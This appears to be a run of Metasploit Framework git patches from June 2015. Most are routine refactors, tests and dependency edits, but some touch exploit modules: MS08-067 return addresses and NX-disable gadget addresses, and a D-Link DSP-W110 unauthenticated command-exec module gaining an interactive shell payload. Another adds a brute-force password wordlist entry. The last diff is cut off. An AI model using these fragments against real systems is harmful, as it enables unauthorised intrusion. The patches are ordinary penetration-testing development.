--- a/modules/exploits/linux/http/kloxo_sqli.rb
+++ b/modules/exploits/linux/http/kloxo_sqli.rb
@@ -94,6 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
     login_data = {
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      last_attempted_at: opts[:attempt_time]
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -125,7 +126,8 @@ class Metasploit3 < Msf::Exploit::Remote
       port: rport,
       user: 'admin',
       service_name: 'http',
-      password: @password
+      password: @password,
+      attempt_time: DateTime.now
     )
 
     print_status("#{peer} - Retrieving the server name...")

From dfae4bbbf0c1a8f5e6dfda07fdc5302530904aa8 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 19 Jun 2015 10:48:12 -0500
Subject: [PATCH 0464/1013] Do reporting more accurate

---
 .../auxiliary/scanner/http/wordpress_login_enum.rb  | 13 ++++++++++---
 1 file changed, 10 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/scanner/http/wordpress_login_enum.rb b/modules/auxiliary/scanner/http/wordpress_login_enum.rb
index b63a7b7bad..ce0bc33bd5 100644
--- a/modules/auxiliary/scanner/http/wordpress_login_enum.rb
+++ b/modules/auxiliary/scanner/http/wordpress_login_enum.rb
@@ -125,9 +125,13 @@ class Metasploit3 < Msf::Auxiliary
 
     login_data = {
       core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      status: opts[:status]
     }.merge(service_data)
 
+    if opts[:attempt_time]
+      login_data.merge!(last_attempted_at: opts[:attempt_time])
+    end
+
     create_credential_login(login_data)
   end
 
@@ -142,7 +146,8 @@ class Metasploit3 < Msf::Auxiliary
       report_cred(
         ip: rhost,
         port: rport,
-        user: user
+        user: user,
+        status: Metasploit::Model::Login::Status::UNTRIED
       )
 
       @users_found[user] = :reported
@@ -166,7 +171,9 @@ class Metasploit3 < Msf::Auxiliary
         ip: rhost,
         port: rport,
         user: user,
-        password: pass
+        password: pass,
+        status: Metasploit::Model::Login::Status::SUCCESSFUL,
+        attempt_time: DateTime.now
       )
 
       return :next_user

From b9948011728b7ae04872e8e408b66c58a8a0c23a Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Fri, 19 Jun 2015 11:22:40 -0500
Subject: [PATCH 0465/1013] Revert auto tab replacement

---
 modules/exploits/multi/http/jboss_invoke_deploy.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/jboss_invoke_deploy.rb b/modules/exploits/multi/http/jboss_invoke_deploy.rb
index 27d59c4c20..4b68cfdd07 100644
--- a/modules/exploits/multi/http/jboss_invoke_deploy.rb
+++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb
@@ -102,7 +102,7 @@ class Metasploit4 < Msf::Exploit::Remote
     return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_4_/
     return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_5_/
 
-    if res.body =~ /ServletException/   # Simple check, if we caused an exception.
+    if res.body =~ /ServletException/ # Simple check, if we caused an exception.
       vprint_status('Target seems vulnerable, but the used JBoss version is not supported by this exploit')
       return Exploit::CheckCode::Appears
     end

From 5a277389f2eb86f4ce8b40b74b0cc0de57eb393e Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Fri, 19 Jun 2015 11:38:22 -0500
Subject: [PATCH 0466/1013] remove some trailing commas

---
 modules/auxiliary/gather/ssllabs_scan.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/gather/ssllabs_scan.rb b/modules/auxiliary/gather/ssllabs_scan.rb
index 0eb62bd5e6..b488864ca5 100644
--- a/modules/auxiliary/gather/ssllabs_scan.rb
+++ b/modules/auxiliary/gather/ssllabs_scan.rb
@@ -185,7 +185,7 @@ class Metasploit3 < Msf::Auxiliary
                :sgc?,
                :validationType,
                :issues,
-               :sct?,
+               :sct?
 
     def valid?
       issues == 0
@@ -211,7 +211,7 @@ class Metasploit3 < Msf::Auxiliary
                :revocationStatus,
                :crlRevocationStatus,
                :ocspRevocationStatus,
-               :raw,
+               :raw
 
     def valid?
       issues == 0

From bf170a195dd130210ab255bbd8d30fc80ab86529 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Fri, 19 Jun 2015 11:38:36 -0500
Subject: [PATCH 0467/1013] the API sometimes returns negative percents - treat
 these as 0

---
 modules/auxiliary/gather/ssllabs_scan.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/gather/ssllabs_scan.rb b/modules/auxiliary/gather/ssllabs_scan.rb
index b488864ca5..316dd0886a 100644
--- a/modules/auxiliary/gather/ssllabs_scan.rb
+++ b/modules/auxiliary/gather/ssllabs_scan.rb
@@ -714,7 +714,7 @@ class Metasploit3 < Msf::Auxiliary
     return unless r.status == "IN_PROGRESS"
 
     if r.endpoints.length == 1
-      print_status "#{r.host} (#{r.endpoints[0].ip_address}) - Progress #{r.endpoints[0].progress}% (#{r.endpoints[0].status_details_message})"
+      print_status "#{r.host} (#{r.endpoints[0].ip_address}) - Progress #{[r.endpoints[0].progress, 0].max}% (#{r.endpoints[0].status_details_message})"
     elsif r.endpoints.length > 1
       in_progress_srv_num = 0
       ready_srv_num = 0
@@ -723,7 +723,7 @@ class Metasploit3 < Msf::Auxiliary
         case e.status_message.to_s
         when "In progress"
           in_progress_srv_num += 1
-          print_status "Scanned host: #{e.ip_address} (#{e.server_name})- #{e.progress}% complete (#{e.status_details_message})"
+          print_status "Scanned host: #{e.ip_address} (#{e.server_name})- #{[e.progress, 0].max}% complete (#{e.status_details_message})"
         when "Pending"
           pending_srv_num += 1
         when "Ready"

From 34ece37f264061412e6970be65dbfd9ef323f64f Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 19 Jun 2015 12:17:43 -0500
Subject: [PATCH 0468/1013] First off, iconv is gone, and zlib is stdlib

---
 lib/rex/text.rb | 12 +-----------
 1 file changed, 1 insertion(+), 11 deletions(-)

diff --git a/lib/rex/text.rb b/lib/rex/text.rb
index d321b573d1..ac6bdb0906 100644
--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -4,17 +4,7 @@ require 'digest/sha1'
 require 'stringio'
 require 'cgi'
 require 'rex/powershell'
-
-%W{ iconv zlib }.each do |libname|
-  begin
-    old_verbose = $VERBOSE
-    $VERBOSE = nil
-    require libname
-  rescue ::LoadError
-  ensure
-    $VERBOSE = old_verbose
-  end
-end
+require 'zlib'
 
 module Rex
 

From afe5bb54c30c2a0ba245022051ee69df911a6221 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 19 Jun 2015 12:24:07 -0500
Subject: [PATCH 0469/1013] Get rid of the fall through methods

---
 lib/rex/text.rb | 38 ++++++++------------------------------
 1 file changed, 8 insertions(+), 30 deletions(-)

diff --git a/lib/rex/text.rb b/lib/rex/text.rb
index ac6bdb0906..4d9e140cd7 100644
--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -45,7 +45,8 @@ module Text
 
   DefaultPatternSets = [ Rex::Text::UpperAlpha, Rex::Text::LowerAlpha, Rex::Text::Numerals ]
 
-  # In case Iconv isn't loaded
+  # The Iconv translation table. The Iconv gem is deprecated in favor of
+  # String#encode, yet there is no encoding for EBCDIC. See #4525
   Iconv_EBCDIC = [
     "\x00", "\x01", "\x02", "\x03", "7", "-", ".", "/", "\x16", "\x05",
     "%", "\v", "\f", "\r", "\x0E", "\x0F", "\x10", "\x11", "\x12", "\x13",
@@ -386,9 +387,9 @@ module Text
   #
   class IllegalSequence < ArgumentError; end
 
-  # A native implementation of the ASCII->EBCDIC table, used to fall back from using
-  # Iconv
-  def self.to_ebcdic_rex(str)
+  # A native implementation of the EBCDIC->ASCII table, since it's not available
+  # in String#encode
+  def self.to_ebcdic(str)
     new_str = []
     str.each_byte do |x|
       if Iconv_ASCII.index(x.chr)
@@ -400,9 +401,9 @@ module Text
     new_str.join
   end
 
-  # A native implementation of the EBCDIC->ASCII table, used to fall back from using
-  # Iconv
-  def self.from_ebcdic_rex(str)
+  # A native implementation of the EBCDIC->ASCII table, since it's not available
+  # in String#encode
+  def self.from_ebcdic(str)
     new_str = []
     str.each_byte do |x|
       if Iconv_EBCDIC.index(x.chr)
@@ -414,29 +415,6 @@ module Text
     new_str.join
   end
 
-  def self.to_ebcdic(str)
-    begin
-      Iconv.iconv("EBCDIC-US", "ASCII", str).first
-    rescue ::Iconv::IllegalSequence => e
-      raise e
-    rescue
-      self.to_ebcdic_rex(str)
-    end
-  end
-
-  #
-  # Converts EBCIDC to ASCII
-  #
-  def self.from_ebcdic(str)
-    begin
-      Iconv.iconv("ASCII", "EBCDIC-US", str).first
-    rescue ::Iconv::IllegalSequence => e
-      raise e
-    rescue
-      self.from_ebcdic_rex(str)
-    end
-  end
-
   #
   # Returns the words in +str+ as an Array.
   #

From a004c72068ac106bf38c55cdcff687b1b1ddb154 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 19 Jun 2015 12:30:20 -0500
Subject: [PATCH 0470/1013] Get rid of the encode test and iconv fallback

---
 lib/rex/text.rb | 15 +++------------
 1 file changed, 3 insertions(+), 12 deletions(-)

diff --git a/lib/rex/text.rb b/lib/rex/text.rb
index 4d9e140cd7..532bd370cb 100644
--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -366,20 +366,11 @@ module Text
   end
 
   #
-  # Converts ISO-8859-1 to UTF-8
+  # Converts US-ASCII and ISO-8859-1 to UTF-8, skipping over
+  # any characters which don't convert cleanly.
   #
   def self.to_utf8(str)
-
-    if str.respond_to?(:encode)
-      # Skip over any bytes that fail to convert to UTF-8
-      return str.encode('utf-8', { :invalid => :replace, :undef => :replace, :replace => '' })
-    end
-
-    begin
-      Iconv.iconv("utf-8","iso-8859-1", str).join(" ")
-    rescue
-      raise ::RuntimeError, "Your installation does not support iconv (needed for utf8 conversion)"
-    end
+      str.encode('utf-8', { :invalid => :replace, :undef => :replace, :replace => '' })
   end
 
   #

From 01e37386dd8027ed0be07b0938cf8e8ab1c65403 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 19 Jun 2015 12:59:47 -0500
Subject: [PATCH 0471/1013] Add some YARD docs to the ebcdic methods

---
 lib/rex/text.rb | 28 ++++++++++++++++++----------
 1 file changed, 18 insertions(+), 10 deletions(-)

diff --git a/lib/rex/text.rb b/lib/rex/text.rb
index 532bd370cb..b5dfe85fb9 100644
--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -365,21 +365,25 @@ module Text
     return str
   end
 
+  # Converts US-ASCII to UTF-8, skipping over any characters which don't
+  # convert cleanly. This is a convenience method that wraps
+  # String#encode with non-raising default paramaters.
   #
-  # Converts US-ASCII and ISO-8859-1 to UTF-8, skipping over
-  # any characters which don't convert cleanly.
-  #
+  # @param str [String] An encodable ASCII string
+  # @return [String] a UTF-8 equivalent
+  # @note This method will discard invalid characters
   def self.to_utf8(str)
       str.encode('utf-8', { :invalid => :replace, :undef => :replace, :replace => '' })
   end
 
-  #
-  # Converts ASCII to EBCDIC
-  #
   class IllegalSequence < ArgumentError; end
 
-  # A native implementation of the EBCDIC->ASCII table, since it's not available
-  # in String#encode
+  # A native implementation of the ASCII to EBCDIC conversion table, since
+  # EBCDIC isn't available to String#encode as of Ruby 2.1
+  #
+  # @param str [String] An encodable ASCII string
+  # @return [String] an EBCDIC encoded string
+  # @note This method will raise in the event of invalid characters
   def self.to_ebcdic(str)
     new_str = []
     str.each_byte do |x|
@@ -392,8 +396,12 @@ module Text
     new_str.join
   end
 
-  # A native implementation of the EBCDIC->ASCII table, since it's not available
-  # in String#encode
+  # A native implementation of the EBCIDC to ASCII conversion table, since
+  # EBCDIC isn't available to String#encode as of Ruby 2.1
+  #
+  # @param str [String] an EBCDIC encoded string
+  # @return [String] An encodable ASCII string
+  # @note This method will raise in the event of invalid characters
   def self.from_ebcdic(str)
     new_str = []
     str.each_byte do |x|

From 66fecb2832ecde2d61eeebe43d0d6cbe635dcd38 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 19 Jun 2015 13:22:31 -0500
Subject: [PATCH 0472/1013] Add some specs around changed methods

See #4525
---
 spec/lib/rex/text_spec.rb | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)

diff --git a/spec/lib/rex/text_spec.rb b/spec/lib/rex/text_spec.rb
index 839270eba3..4609065457 100644
--- a/spec/lib/rex/text_spec.rb
+++ b/spec/lib/rex/text_spec.rb
@@ -4,6 +4,31 @@ require 'rex/text'
 describe Rex::Text do
   context "Class methods" do
 
+    context ".to_ebcdic" do
+      it "should convert ASCII to EBCDIC (both US standards)" do
+        described_class.to_ebcdic("Hello, World!").should eq("\xc8\x85\x93\x93\x96\x6b\x40\xe6\x96\x99\x93\x84\x5a")
+      end
+      it "should raise on non-convertable characters" do
+        lambda {described_class.to_ebcdic("\xff\xfe")}.should raise_exception(described_class::IllegalSequence)
+      end
+    end
+
+    context ".from_ebcdic" do
+      it "should convert EBCDIC to ASCII (both US standards)" do
+        described_class.from_ebcdic("\xc8\x85\x93\x93\x96\x6b\x40\xe6\x96\x99\x93\x84\x5a").should eq("Hello, World!")
+      end
+      it "should raise on non-convertable characters" do
+        lambda {described_class.from_ebcdic("\xff\xfe")}.should raise_exception(described_class::IllegalSequence)
+      end
+    end
+
+    context ".to_utf8" do
+      it "should convert a string to UTF-8, skipping badchars" do
+        described_class.to_utf8("Hello, world!").should eq("Hello, world!")
+        described_class.to_utf8("Oh no, \xff\xfe can't convert!").should eq("Oh no,  can't convert!")
+      end
+    end
+
     context ".to_octal" do
       it "should convert all chars 00 through ff" do
         described_class.to_octal("\x7f"*100).should eq("\\177"*100)

From ef57afbfcfabf645bfe29557986074be69573240 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 19 Jun 2015 13:35:14 -0500
Subject: [PATCH 0473/1013] Explain about performance problems

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 31ac710b3f..c428af2cbb 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -397,6 +397,11 @@ module Msf
     # Checks whether the payload is compatible with the module based on the module's compatibility list.
     # Best for multi-platform modules. This is much slower than #is_payload_platform_compatible?
     #
+    # @note This method is really slow, and it's really noticeable with Flash exploits because they're
+    #  multi-platform. In our testing, every Flash that ends up using this code takes about 0.4 second
+    #  to initialize when on average each BES should only take 0.1 to load. Evetnaully this will get
+    #  worse. Luke is in the process of improving module searching (by caching), and that should make
+    #  this problem go away. If not, we'll have to avoid using compatible_payloads and do our own thing.
     # @param [Object] m Module.
     # @param [String] payload_name
     # @return [TrueClass] Payload is compatible.

From 7eeb8805ee5b973975aaf3bc9eaa28e7cd31fe65 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 19 Jun 2015 13:37:02 -0500
Subject: [PATCH 0474/1013] Do minor code cleanup

---
 lib/rex/proto/rfb/client.rb    | 11 +++++------
 lib/rex/proto/rfb/constants.rb |  4 +---
 2 files changed, 6 insertions(+), 9 deletions(-)

diff --git a/lib/rex/proto/rfb/client.rb b/lib/rex/proto/rfb/client.rb
index 44251aaf55..684682f89f 100644
--- a/lib/rex/proto/rfb/client.rb
+++ b/lib/rex/proto/rfb/client.rb
@@ -61,12 +61,11 @@ class Client
 
     @minver = $2.to_i
 
-		# Forces client version 3 to be used. This adds support
-		# 	for version 4 servers.
-		# It may be necessary to hardcode a miniver as well
-		# to do: add support for Version 4. Version 4 client
-		#   adds additional information to the packet regarding
-		#		supported authentication types.
+    # Forces version 3 to be used. This adds support  for version 4 servers.
+    # It may be necessary to hardcode minver as well.
+    # TODO: Add support for Version 4.
+    # Version 4 adds additional information to the packet regarding supported
+    # authentication types.
     our_ver = "RFB %03d.%03d\n" % [3, @minver]
     @sock.put(our_ver)
 
diff --git a/lib/rex/proto/rfb/constants.rb b/lib/rex/proto/rfb/constants.rb
index 4f01ee24a2..0044e24b03 100644
--- a/lib/rex/proto/rfb/constants.rb
+++ b/lib/rex/proto/rfb/constants.rb
@@ -19,9 +19,7 @@ module RFB
 DefaultPort = 5900
 
 # Version information
-# Created array and added support for version 4. aux/scanner/vnc/vnc_login
-#   was confirmed to work with version 004.001
-MajorVersions = [3,4]
+MajorVersions = [3, 4]
 # NOTE: We will emulate whatever minor version the server reports.
 
 # Security types

From d672ac16011e24b4175ffe0ca7f9be6974f1b6f7 Mon Sep 17 00:00:00 2001
From: Greg Mikeska <greg_mikeska@rapid7.com>
Date: Fri, 19 Jun 2015 13:54:31 -0500
Subject: [PATCH 0475/1013] Correct service name for mssql for scanner
 detection

---
 lib/metasploit/framework/login_scanner/mssql.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/metasploit/framework/login_scanner/mssql.rb b/lib/metasploit/framework/login_scanner/mssql.rb
index d7b5aa499e..992459054c 100644
--- a/lib/metasploit/framework/login_scanner/mssql.rb
+++ b/lib/metasploit/framework/login_scanner/mssql.rb
@@ -21,7 +21,7 @@ module Metasploit
         # Lifted from lib/msf/core/exploit/mssql.rb
         LIKELY_PORTS         = [ 1433, 1434, 1435, 14330, 2533, 9152, 2638 ]
         # Lifted from lib/msf/core/exploit/mssql.rb
-        LIKELY_SERVICE_NAMES = [ 'ms-sql-s', 'ms-sql2000', 'sybase' ]
+        LIKELY_SERVICE_NAMES = [ 'ms-sql-s', 'ms-sql2000', 'sybase', 'mssql' ]
         PRIVATE_TYPES        = [ :password, :ntlm_hash ]
         REALM_KEY           = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
 

From b104155cf163f55d084b9e4897b24c831870d7fb Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 19 Jun 2015 15:05:42 -0500
Subject: [PATCH 0476/1013] Do Metasploit::Model::Login::Status::UNTRIED

---
 modules/auxiliary/scanner/http/drupal_views_user_enum.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
index 938f0f4718..705c8cea23 100644
--- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
+++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
     login_data = {
       last_attempted_at: DateTime.now,
       core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      status: Metasploit::Model::Login::Status::UNTRIED,
     }.merge(service_data)
 
     create_credential_login(login_data)

From ef286fdfcf584be15bc13bc9cc2d3fbb15db867a Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 19 Jun 2015 15:06:02 -0500
Subject: [PATCH 0477/1013] Remove report_auth_info

---
 modules/auxiliary/scanner/http/splunk_web_login.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/splunk_web_login.rb b/modules/auxiliary/scanner/http/splunk_web_login.rb
index d4db7b12de..9f7e9a59ab 100644
--- a/modules/auxiliary/scanner/http/splunk_web_login.rb
+++ b/modules/auxiliary/scanner/http/splunk_web_login.rb
@@ -193,7 +193,6 @@ class Metasploit3 < Msf::Auxiliary
       report_cred(ip: datastore['RHOST'], port: datastore['RPORT'], user:user, password: pass)
 
 
-      report_auth_info(report_hash)
       return :next_user
 
     rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT

From 83427583eafc0c9758800a5725384fe69082ec1b Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 19 Jun 2015 15:09:50 -0500
Subject: [PATCH 0478/1013] report_note for group info

---
 modules/auxiliary/scanner/http/cisco_ssl_vpn.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb
index 5f14f63e63..e8b6a0e4ef 100644
--- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb
+++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb
@@ -225,6 +225,7 @@ class Metasploit3 < Msf::Auxiliary
         do_logout(resp.get_cookies)
 
         report_cred(ip: rhost, port: rport, user: user, password: pass)
+        report_note(ip: rhost, type: 'cisco.cred.group', data: group)
         return :next_user
 
       else

From b580f93c22242102e76007e389ba7a8965fed3e5 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 19 Jun 2015 15:05:46 -0500
Subject: [PATCH 0479/1013] New password from Snowden

---
 data/wordlists/unix_passwords.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/data/wordlists/unix_passwords.txt b/data/wordlists/unix_passwords.txt
index 02728bc293..08c9a5b1c5 100755
--- a/data/wordlists/unix_passwords.txt
+++ b/data/wordlists/unix_passwords.txt
@@ -1002,4 +1002,5 @@ sq!us3r
 adminpasswd
 raspberry
 74k&^*nh#$
-arcsight
\ No newline at end of file
+arcsight
+MargaretThatcheris110%SEXY

From fa6e45964e87bbfbbdea04249beada94e76f9fd9 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 19 Jun 2015 15:38:26 -0500
Subject: [PATCH 0480/1013] Provide context to the note

---
 modules/auxiliary/scanner/http/cisco_ssl_vpn.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb
index e8b6a0e4ef..145ef81c0a 100644
--- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb
+++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb
@@ -225,7 +225,7 @@ class Metasploit3 < Msf::Auxiliary
         do_logout(resp.get_cookies)
 
         report_cred(ip: rhost, port: rport, user: user, password: pass)
-        report_note(ip: rhost, type: 'cisco.cred.group', data: group)
+        report_note(ip: rhost, type: 'cisco.cred.group', data: "User: #{user} / Group: #{group}")
         return :next_user
 
       else

From 61ad4ada7d0024afd64318afea02536a40bab181 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 19 Jun 2015 16:03:16 -0500
Subject: [PATCH 0481/1013] Delete commas

---
 modules/exploits/windows/smb/ms08_067_netapi.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb
index ec7bd17085..61ce551f51 100644
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -626,7 +626,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'Windows 2003 SP1 French (NO NX)',
             {
               'Ret'       => 0x71ac1c40 ,
-              'Scratch'   => 0x00020408,
+              'Scratch'   => 0x00020408
             }
           ], # JMP ESI WS2HELP.DLL
 
@@ -638,7 +638,7 @@ class Metasploit3 < Msf::Exploit::Remote
               'RetPop'    => 0x7CB47CF4,  # push ESI, pop EBP, ret 4 @SHELL32.DLL
               'JmpESP'    => 0x7C98FED3,  # jmp ESP @NTDLL.DLL
               'DisableNX' => 0x7C95E413,  # NX disable @NTDLL.DLL
-              'Scratch'   => 0x00020408,
+              'Scratch'   => 0x00020408
             }
           ],
 
@@ -722,7 +722,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'Windows 2003 SP2 French (NO NX)',
             {
               'Ret'       => 0x71AC2069,
-              'Scratch'   => 0x00020408,
+              'Scratch'   => 0x00020408
             }
           ], # CALL ESI WS2HELP.DLL
 
@@ -734,7 +734,7 @@ class Metasploit3 < Msf::Exploit::Remote
               'RetPop'    => 0x7CB3E84E,  # push ESI, pop EBP, ret @SHELL32.DLL
               'JmpESP'    => 0x7C98A01B,  # jmp ESP @NTDLL.DLL
               'DisableNX' => 0x7C95F517,  # NX disable @NTDLL.DLL
-              'Scratch'   => 0x00020408,
+              'Scratch'   => 0x00020408
             }
           ],
 

From ee9830e2e946df75c63690dd3e8b6178185818b5 Mon Sep 17 00:00:00 2001
From: Trevor Rosen <trevor@catapult-creative.com>
Date: Fri, 19 Jun 2015 17:10:02 -0500
Subject: [PATCH 0482/1013] Point MDM to branch for community verification

MSP-12834
---
 Gemfile                         |  2 ++
 Gemfile.lock                    | 28 +++++++++++++++++-----------
 metasploit-framework-db.gemspec |  2 +-
 3 files changed, 20 insertions(+), 12 deletions(-)

diff --git a/Gemfile b/Gemfile
index 225cadb5e1..4cced580c1 100755
--- a/Gemfile
+++ b/Gemfile
@@ -24,6 +24,8 @@ group :development do
   gem 'pry'
 end
 
+gem 'metasploit_data_models', git: 'git@github.com:rapid7/metasploit_data_models', branch:'bug/MSP-12834/crawler-choke-on-save'
+
 group :development, :test do
   # automatically include factories from spec/factories
   gem 'factory_girl_rails', '~> 4.5.0'
diff --git a/Gemfile.lock b/Gemfile.lock
index 20788623a7..1c2cb44943 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,3 +1,19 @@
+GIT
+  remote: git@github.com:rapid7/metasploit_data_models
+  revision: c36c800866d42187c21c1308a9bac5f3278d8aa3
+  branch: bug/MSP-12834/crawler-choke-on-save
+  specs:
+    metasploit_data_models (1.2.4)
+      activerecord (>= 4.0.9, < 4.1.0)
+      activesupport (>= 4.0.9, < 4.1.0)
+      arel-helpers
+      metasploit-concern (~> 1.0)
+      metasploit-model (~> 1.0)
+      pg
+      postgres_ext
+      railties (>= 4.0.9, < 4.1.0)
+      recog (~> 2.0)
+
 PATH
   remote: .
   specs:
@@ -24,7 +40,6 @@ PATH
       activerecord (>= 4.0.9, < 4.1.0)
       metasploit-credential (~> 1.0)
       metasploit-framework (= 4.11.0.pre.dev)
-      metasploit_data_models (~> 1.2)
       pg (>= 0.11)
     metasploit-framework-pcap (4.11.0.pre.dev)
       metasploit-framework (= 4.11.0.pre.dev)
@@ -124,16 +139,6 @@ GEM
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
     metasploit-payloads (1.0.2)
-    metasploit_data_models (1.2.3)
-      activerecord (>= 4.0.9, < 4.1.0)
-      activesupport (>= 4.0.9, < 4.1.0)
-      arel-helpers
-      metasploit-concern (~> 1.0)
-      metasploit-model (~> 1.0)
-      pg
-      postgres_ext
-      railties (>= 4.0.9, < 4.1.0)
-      recog (~> 2.0)
     method_source (0.8.2)
     mime-types (2.4.3)
     mini_portile (0.6.2)
@@ -238,6 +243,7 @@ DEPENDENCIES
   metasploit-framework!
   metasploit-framework-db!
   metasploit-framework-pcap!
+  metasploit_data_models!
   pry
   rake (>= 10.0.0)
   redcarpet
diff --git a/metasploit-framework-db.gemspec b/metasploit-framework-db.gemspec
index d64792775f..ecf71ac825 100644
--- a/metasploit-framework-db.gemspec
+++ b/metasploit-framework-db.gemspec
@@ -31,7 +31,7 @@ Gem::Specification.new do |spec|
   # Metasploit::Credential database models
   spec.add_runtime_dependency 'metasploit-credential', '~> 1.0'
   # Database models shared between framework and Pro.
-  spec.add_runtime_dependency 'metasploit_data_models', '~> 1.2'
+  #spec.add_runtime_dependency 'metasploit_data_models', '~> 1.2'
   # depend on metasploit-framewrok as the optional gems are useless with the actual code
   spec.add_runtime_dependency 'metasploit-framework', "= #{spec.version}"
   # Needed for module caching in Mdm::ModuleDetails

From d8e11789ea9b74f130c941a74cc7284c8ae17a98 Mon Sep 17 00:00:00 2001
From: Michael Messner <devnull@s3cur1ty.de>
Date: Sat, 20 Jun 2015 07:59:25 +0200
Subject: [PATCH 0483/1013] cmd_interact - first try

---
 .../http/dlink_dspw110_cookie_noauth_exec.rb  | 81 +++++++++++++------
 1 file changed, 58 insertions(+), 23 deletions(-)

diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
index b971cd2655..76ea25f2fa 100644
--- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
@@ -9,7 +9,6 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Auxiliary::CommandShell
 
   def initialize(info = {})
     super(update_info(info,
@@ -33,6 +32,16 @@ class Metasploit3 < Msf::Exploit::Remote
           ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
         ],
       'DisclosureDate' => 'Jun 12 2015',
+      'Platform'       => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Payload'     =>
+        {
+          'Compat'  => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find',
+          },
+        },
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
